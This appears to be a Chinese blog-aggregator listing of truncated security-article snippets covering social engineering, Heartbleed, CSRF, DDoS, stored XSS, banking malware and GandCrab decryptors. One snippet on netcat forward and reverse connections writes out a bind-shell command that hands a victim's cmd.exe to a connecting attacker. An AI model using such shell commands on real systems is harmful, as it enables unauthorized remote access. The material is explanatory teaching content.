社会工程学简介 一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段。 取得自身利益的手法,近年来已成迅速上升甚至滥用的趋势。那么,什么算是社会工程学呢? 它并不能等同于一般的欺骗手法,社会工程学尤其复杂,即使自认为最警惕最小心的人,一样会被高明的社会工程学手 ...
分类:
其他好文 时间:
2019-11-06 00:59:08
阅读次数:
123
OpenSSL1.0.1版本 Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。 ...
分类:
其他好文 时间:
2019-10-11 00:39:26
阅读次数:
139
1、CSRF攻击者不需要登录,越权攻击者也得登录,只是没有做针对性的控制; 2、CSRF攻击者自己不访问受攻击页面,诱导受害者在登录被攻击系统后点击攻击页面;越权攻击者可以直接访问受攻击页面; 3、CSRF一般受同源策略的限制,没有返回值,只能提交请求,越权可以执行并获取返回值,只是返回值超出了自身... ...
分类:
其他好文 时间:
2019-10-08 12:17:38
阅读次数:
98
(1).DDos概念 分布式拒绝服务攻击(英文意思是Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的,这 ...
分类:
其他好文 时间:
2019-09-01 16:50:30
阅读次数:
179
csrf(Cross-site request forgery) 跨站请求伪造 是指利用受害者尚未失效的身份认证信息,诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向服务器发送请求,从而完成非法操作 但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通 ...
分类:
其他好文 时间:
2019-08-24 09:59:34
阅读次数:
95
CSRF 介绍 CSRF,全称Cross-site request forgery,即跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操 ...
分类:
其他好文 时间:
2019-08-20 10:30:02
阅读次数:
128
正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者:nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 80 直接监听内网所有主机80端口 反向连接 受害者 A 出于内网状态 192.168.1.25 攻击 ...
分类:
其他好文 时间:
2019-08-17 14:34:19
阅读次数:
108
近期,有网络安全研究专家表示,发现网络上出现大量主要针对网银的恶意程序,是由***通过脸书和其它公共群组服务的CDN内容方式进行的。 安全研究人员还表示,***先是将恶意程序上传到脸书的公共服务,然后获得来自脸书分享的文件跳转地址。 ***通过此类方式注入恶意程序,可以很有效的通过各大公司的网址通常浏览器,还可以躲避安全软件的监测,与此同时获取用户的信任,更好的让用户下载恶意程序。 利用Pow
分类:
其他好文 时间:
2019-08-07 10:51:04
阅读次数:
117
XSS存储型跨站攻击(Stored Cross Site Scripting) 前言: 相较于XSS反射型跨站攻击,存储型具有更严重的危害,如果在窃取信息的同时对网页没有任何变化,那受害者将很难发现。 如果我有写的不太明白的地方,可以先看看之前XSS反射型跨站攻击的随笔 low: 1.观察: 测试输 ...
分类:
其他好文 时间:
2019-06-24 22:43:13
阅读次数:
289
Bitdefender与包括欧洲刑警组织,罗马尼亚警察局,DIICOT,FBI,NCA和大都会警察局以及法国保加利亚警察局在内的合作伙伴执法机构合作,提供了几个解密工具,以帮助GandCrab受害者免费解密他们的数据
分类:
其他好文 时间:
2019-06-18 17:11:35
阅读次数:
127
